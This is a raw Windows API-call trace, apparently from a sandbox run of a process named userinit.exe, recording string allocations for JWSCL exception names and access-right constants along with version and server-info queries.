[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x2a2f378*="EJwsclInvalidKeyPath") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x2a2f360*="EJwsclInvalidGenericAccessMask") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x2a2f348*="EJwsclAdaptSecurityInfoException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x2a2f330*="EJwsclThreadException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x2a2f318*="EJwsclInvalidObjectException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x2a2f300*="EJwsclSecurityObjectException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x2a2f2e8*="EJwsclHashMismatch") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x2a2f2d0*="EJwsclStreamHashException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x2a2f2b8*="EJwsclStreamInvalidMagicException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x2a2f2a0*="EJwsclStreamSizeException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x2a2f288*="EJwsclStreamException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x2a2f270*="EJwsclNoSuchLogonSession") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x2a2f258*="EJwsclInvalidFlagsException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x2a2f240*="EJwsclProcessNotFound") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x2a2f228*="EJwsclInvalidParameterException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x2a2f210*="EJwsclInvalidPathException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x2a2f1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x2a2f1e0*="EJwsclInvalidRevision") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x2a2f1c8*="EJwsclInvalidAceMismatch") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x2a2f1b0*="EJwsclRevisionMismatchException") returned 1
[0120.118] SysReAllocStringLen (in: pbstr=0x2a2f198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x2a2f198*="EJwsclInvalidACEException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2f180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x2a2f180*="EJwsclReadOnlyPropertyException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2f168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x2a2f168*="EJwsclDuplicateListEntryException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2f150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x2a2f150*="EJwsclIndexOutOfBoundsException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2f138*=0x0, psz="EJwsclInvalidSidAuthorityValue", len=0x1e | out: pbstr=0x2a2f138*="EJwsclInvalidSidAuthorityValue") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2f120*=0x0, psz="EJwsclInvalidKnownSIDException", len=0x1e | out: pbstr=0x2a2f120*="EJwsclInvalidKnownSIDException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2f108*=0x0, psz="EJwsclInvalidComputer", len=0x15 | out: pbstr=0x2a2f108*="EJwsclInvalidComputer") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2f0f0*=0x0, psz="EJwsclInvalidGroupSIDException", len=0x1e | out: pbstr=0x2a2f0f0*="EJwsclInvalidGroupSIDException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2f0d8*=0x0, psz="EJwsclInvalidOwnerSIDException", len=0x1e | out: pbstr=0x2a2f0d8*="EJwsclInvalidOwnerSIDException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2f0c0*=0x0, psz="EJwsclInvalidSIDException", len=0x19 | out: pbstr=0x2a2f0c0*="EJwsclInvalidSIDException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2f0a8*=0x0, psz="EJwsclInvalidSecurityListException", len=0x22 | out: pbstr=0x2a2f0a8*="EJwsclInvalidSecurityListException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2f090*=0x0, psz="EJwsclInvalidMandatoryLevelException", len=0x24 | out: pbstr=0x2a2f090*="EJwsclInvalidMandatoryLevelException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2f078*=0x0, psz="EJwsclEmptyACLException", len=0x17 | out: pbstr=0x2a2f078*="EJwsclEmptyACLException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2f060*=0x0, psz="EJwsclNILParameterException", len=0x1b | out: pbstr=0x2a2f060*="EJwsclNILParameterException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2f048*=0x0, psz="EJwsclInheritanceSourceNotSupportedException", len=0x2c | out: pbstr=0x2a2f048*="EJwsclInheritanceSourceNotSupportedException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2f030*=0x0, psz="EJwsclInvalidObjectArrayException", len=0x21 | out: pbstr=0x2a2f030*="EJwsclInvalidObjectArrayException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2f018*=0x0, psz="EJwsclProcessIdNotAvailable", len=0x1b | out: pbstr=0x2a2f018*="EJwsclProcessIdNotAvailable") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2f000*=0x0, psz="EJwsclWinCallFailedException", len=0x1c | out: pbstr=0x2a2f000*="EJwsclWinCallFailedException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2efe8*=0x0, psz="EJwsclUnsupportedWindowsVersionException", len=0x28 | out: pbstr=0x2a2efe8*="EJwsclUnsupportedWindowsVersionException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2efd0*=0x0, psz="EJwsclNotImplementedException", len=0x1d | out: pbstr=0x2a2efd0*="EJwsclNotImplementedException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2efb8*=0x0, psz="EJwsclAccessTypeException", len=0x19 | out: pbstr=0x2a2efb8*="EJwsclAccessTypeException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2efa0*=0x0, psz="EJwsclAdjustPrivilegeException", len=0x1e | out: pbstr=0x2a2efa0*="EJwsclAdjustPrivilegeException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2ef88*=0x0, psz="EJwsclPrivilegeCheckException", len=0x1d | out: pbstr=0x2a2ef88*="EJwsclPrivilegeCheckException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2ef70*=0x0, psz="EJwsclPrivilegeNotFoundException", len=0x20 | out: pbstr=0x2a2ef70*="EJwsclPrivilegeNotFoundException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2ef58*=0x0, psz="EJwsclInvalidIndexPrivilegeException", len=0x24 | out: pbstr=0x2a2ef58*="EJwsclInvalidIndexPrivilegeException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2ef40*=0x0, psz="EJwsclPrivilegeException", len=0x18 | out: pbstr=0x2a2ef40*="EJwsclPrivilegeException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2ef28*=0x0, psz="EJwsclNotEnoughMemory", len=0x15 | out: pbstr=0x2a2ef28*="EJwsclNotEnoughMemory") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2ef10*=0x0, psz="EJwsclInvalidTokenHandle", len=0x18 | out: pbstr=0x2a2ef10*="EJwsclInvalidTokenHandle") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2eef8*=0x0, psz="EJwsclNoThreadTokenAvailable", len=0x1c | out: pbstr=0x2a2eef8*="EJwsclNoThreadTokenAvailable") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2eee0*=0x0, psz="EJwsclDuplicateTokenException", len=0x1d | out: pbstr=0x2a2eee0*="EJwsclDuplicateTokenException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2eec8*=0x0, psz="EJwsclInvalidOwnerException", len=0x1b | out: pbstr=0x2a2eec8*="EJwsclInvalidOwnerException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2eeb0*=0x0, psz="EJwsclInvalidPrimaryToken", len=0x19 | out: pbstr=0x2a2eeb0*="EJwsclInvalidPrimaryToken") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2ee98*=0x0, psz="EJwsclTokenPrimaryException", len=0x1b | out: pbstr=0x2a2ee98*="EJwsclTokenPrimaryException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2ee80*=0x0, psz="EJwsclTokenImpersonationException", len=0x21 | out: pbstr=0x2a2ee80*="EJwsclTokenImpersonationException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2ee68*=0x0, psz="EJwsclTokenInformationException", len=0x1f | out: pbstr=0x2a2ee68*="EJwsclTokenInformationException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2ee50*=0x0, psz="EJwsclSharedTokenException", len=0x1a | out: pbstr=0x2a2ee50*="EJwsclSharedTokenException") returned 1
[0120.119] SysReAllocStringLen (in: pbstr=0x2a2ee38*=0x0, psz="EJwsclOpenProcessTokenException", len=0x1f | out: pbstr=0x2a2ee38*="EJwsclOpenProcessTokenException") returned 1
[0120.120] SysReAllocStringLen (in: pbstr=0x2a2ee20*=0x0, psz="EJwsclOpenThreadTokenException", len=0x1e | out: pbstr=0x2a2ee20*="EJwsclOpenThreadTokenException") returned 1
[0120.120] SysReAllocStringLen (in: pbstr=0x2a2ee08*=0x0, psz="EJwsclSecurityException", len=0x17 | out: pbstr=0x2a2ee08*="EJwsclSecurityException") returned 1
[0120.120] SysReAllocStringLen (in: pbstr=0x2a2edf0*=0x0, psz="Exception", len=0x9 | out: pbstr=0x2a2edf0*="Exception") returned 1
[0120.120] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.120] GetProcAddress (hModule=0x75370000, lpProcName="GetVersionExA") returned 0x753c3861
[0120.120] GetVersionExA (in: lpVersionInformation=0x1af28c*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x76a6ea43, dwMinorVersion=0x290000, dwBuildNumber=0x0, dwPlatformId=0x10, szCSDVersion="\xb4\xf2\x1a") | out: lpVersionInformation=0x1af28c*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0120.120] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x0
[0120.120] LoadLibraryA (lpLibFileName="netapi32.dll") returned 0x73b10000
[0120.125] GetProcAddress (hModule=0x73b10000, lpProcName="NetServerGetInfo") returned 0x74f13cfa
[0120.125] NetServerGetInfo (in: servername="", level=0x65, bufptr=0x1af310 | out: bufptr=0x1af310) returned 0x0
[0120.208] GetModuleHandleA (lpModuleName="netapi32.dll") returned 0x73b10000
[0120.208] GetProcAddress (hModule=0x73b10000, lpProcName="NetApiBufferFree") returned 0x73b013d2
[0120.208] NetApiBufferFree (Buffer=0x2b1d00) returned 0x0
[0120.208] SetErrorMode (uMode=0x8000) returned 0x1
[0120.208] LoadLibraryA (lpLibFileName="OLEAUT32.DLL") returned 0x758f0000
[0120.208] SetErrorMode (uMode=0x1) returned 0x8000
[0120.208] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0120.210] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0120.211] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0120.213] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2ec40*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2ec40*="DELETE") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2ec30*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2ec30*="READ_CONTROL") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2ec20*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2ec20*="WRITE_OWNER") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2ec10*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2ec10*="WRITE_DAC") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2ec00*=0x0, psz="FILE_WRITE_ATTRIBUTES", len=0x15 | out: pbstr=0x2a2ec00*="FILE_WRITE_ATTRIBUTES") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2ebf0*=0x0, psz="FILE_READ_ATTRIBUTES", len=0x14 | out: pbstr=0x2a2ebf0*="FILE_READ_ATTRIBUTES") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2ebe0*=0x0, psz="FILE_CREATE_PIPE_INSTANCE", len=0x19 | out: pbstr=0x2a2ebe0*="FILE_CREATE_PIPE_INSTANCE") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2ebd0*=0x0, psz="FILE_WRITE_DATA", len=0xf | out: pbstr=0x2a2ebd0*="FILE_WRITE_DATA") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2ebc0*=0x0, psz="FILE_READ_DATA", len=0xe | out: pbstr=0x2a2ebc0*="FILE_READ_DATA") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2ebb0*=0x0, psz="FILE_ALL_ACCESS", len=0xf | out: pbstr=0x2a2ebb0*="FILE_ALL_ACCESS") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2eba0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2eba0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2eb90*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2eb90*="STANDARD_RIGHTS_WRITE") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2eb80*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2eb80*="STANDARD_RIGHTS_READ") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2eb70*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2eb70*="STANDARD_RIGHTS_ALL") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2eb50*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2eb50*="DELETE") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2eb40*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2eb40*="READ_CONTROL") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2eb30*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2eb30*="WRITE_OWNER") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2eb20*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2eb20*="WRITE_DAC") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2eb10*=0x0, psz="TOKEN_ADJUST_SESSIONID", len=0x16 | out: pbstr=0x2a2eb10*="TOKEN_ADJUST_SESSIONID") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2eb00*=0x0, psz="TOKEN_ADJUST_DEFAULT", len=0x14 | out: pbstr=0x2a2eb00*="TOKEN_ADJUST_DEFAULT") returned 1
[0120.214] SysReAllocStringLen (in: pbstr=0x2a2eaf0*=0x0, psz="TOKEN_ADJUST_GROUPS", len=0x13 | out: pbstr=0x2a2eaf0*="TOKEN_ADJUST_GROUPS") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2eae0*=0x0, psz="TOKEN_ADJUST_PRIVILEGES", len=0x17 | out: pbstr=0x2a2eae0*="TOKEN_ADJUST_PRIVILEGES") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2ead0*=0x0, psz="TOKEN_QUERY_SOURCE", len=0x12 | out: pbstr=0x2a2ead0*="TOKEN_QUERY_SOURCE") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2eac0*=0x0, psz="TOKEN_QUERY", len=0xb | out: pbstr=0x2a2eac0*="TOKEN_QUERY") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2eab0*=0x0, psz="TOKEN_IMPERSONATE", len=0x11 | out: pbstr=0x2a2eab0*="TOKEN_IMPERSONATE") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2eaa0*=0x0, psz="TOKEN_DUPLICATE", len=0xf | out: pbstr=0x2a2eaa0*="TOKEN_DUPLICATE") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2ea90*=0x0, psz="TOKEN_ASSIGN_PRIMARY", len=0x14 | out: pbstr=0x2a2ea90*="TOKEN_ASSIGN_PRIMARY") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2ea80*=0x0, psz="TOKEN_ALL_ACCESS", len=0x10 | out: pbstr=0x2a2ea80*="TOKEN_ALL_ACCESS") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2ea70*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2ea70*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2ea60*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2ea60*="STANDARD_RIGHTS_WRITE") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2ea50*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2ea50*="STANDARD_RIGHTS_READ") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2ea40*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2ea40*="STANDARD_RIGHTS_ALL") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2ea30*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2ea30*="DELETE") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2ea20*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2ea20*="READ_CONTROL") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2ea10*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2ea10*="WRITE_OWNER") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2ea00*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2ea00*="WRITE_DAC") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2e9f0*=0x0, psz="TIMER_MODIFY_STATE", len=0x12 | out: pbstr=0x2a2e9f0*="TIMER_MODIFY_STATE") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2e9e0*=0x0, psz="TIMER_QUERY_STATE", len=0x11 | out: pbstr=0x2a2e9e0*="TIMER_QUERY_STATE") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2e9d0*=0x0, psz="TIMER_ALL_ACCESS", len=0x10 | out: pbstr=0x2a2e9d0*="TIMER_ALL_ACCESS") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2e9c0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e9c0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2e9b0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e9b0*="STANDARD_RIGHTS_WRITE") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2e9a0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e9a0*="STANDARD_RIGHTS_READ") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2e990*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e990*="STANDARD_RIGHTS_ALL") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2e980*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e980*="DELETE") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2e970*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e970*="READ_CONTROL") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2e960*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e960*="WRITE_OWNER") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2e950*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e950*="WRITE_DAC") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2e940*=0x0, psz="SECTION_EXTEND_SIZE", len=0x13 | out: pbstr=0x2a2e940*="SECTION_EXTEND_SIZE") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2e930*=0x0, psz="FILE_MAP_READ", len=0xd | out: pbstr=0x2a2e930*="FILE_MAP_READ") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2e920*=0x0, psz="FILE_MAP_WRITE", len=0xe | out: pbstr=0x2a2e920*="FILE_MAP_WRITE") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2e910*=0x0, psz="FILE_MAP_COPY", len=0xd | out: pbstr=0x2a2e910*="FILE_MAP_COPY") returned 1
[0120.215] SysReAllocStringLen (in: pbstr=0x2a2e900*=0x0, psz="FILE_MAP_ALL_ACCESS", len=0x13 | out: pbstr=0x2a2e900*="FILE_MAP_ALL_ACCESS") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e8f0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e8f0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e8e0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e8e0*="STANDARD_RIGHTS_WRITE") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e8d0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e8d0*="STANDARD_RIGHTS_READ") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e8c0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e8c0*="STANDARD_RIGHTS_ALL") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e8b0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e8b0*="DELETE") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e8a0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e8a0*="READ_CONTROL") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e890*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e890*="WRITE_OWNER") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e880*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e880*="WRITE_DAC") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e870*=0x0, psz="MUTEX_MODIFY_STATE", len=0x12 | out: pbstr=0x2a2e870*="MUTEX_MODIFY_STATE") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e860*=0x0, psz="MUTEX_ALL_ACCESS", len=0x10 | out: pbstr=0x2a2e860*="MUTEX_ALL_ACCESS") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e850*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e850*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e840*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e840*="STANDARD_RIGHTS_WRITE") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e830*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e830*="STANDARD_RIGHTS_READ") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e820*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e820*="STANDARD_RIGHTS_ALL") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e810*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e810*="DELETE") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e800*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e800*="READ_CONTROL") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e7f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e7f0*="WRITE_OWNER") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e7e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e7e0*="WRITE_DAC") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e7d0*=0x0, psz="EVENT_MODIFY_STATE", len=0x12 | out: pbstr=0x2a2e7d0*="EVENT_MODIFY_STATE") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e7c0*=0x0, psz="EVENT_ALL_ACCESS", len=0x10 | out: pbstr=0x2a2e7c0*="EVENT_ALL_ACCESS") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e7b0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e7b0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e7a0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e7a0*="STANDARD_RIGHTS_WRITE") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e790*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e790*="STANDARD_RIGHTS_READ") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e780*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e780*="STANDARD_RIGHTS_ALL") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e770*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e770*="DELETE") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e760*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e760*="READ_CONTROL") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e750*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e750*="WRITE_OWNER") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e740*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e740*="WRITE_DAC") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e730*=0x0, psz="SEMAPHORE_MODIFY_STATE", len=0x16 | out: pbstr=0x2a2e730*="SEMAPHORE_MODIFY_STATE") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e720*=0x0, psz="SEMAPHORE_ALL_ACCESS", len=0x14 | out: pbstr=0x2a2e720*="SEMAPHORE_ALL_ACCESS") returned 1
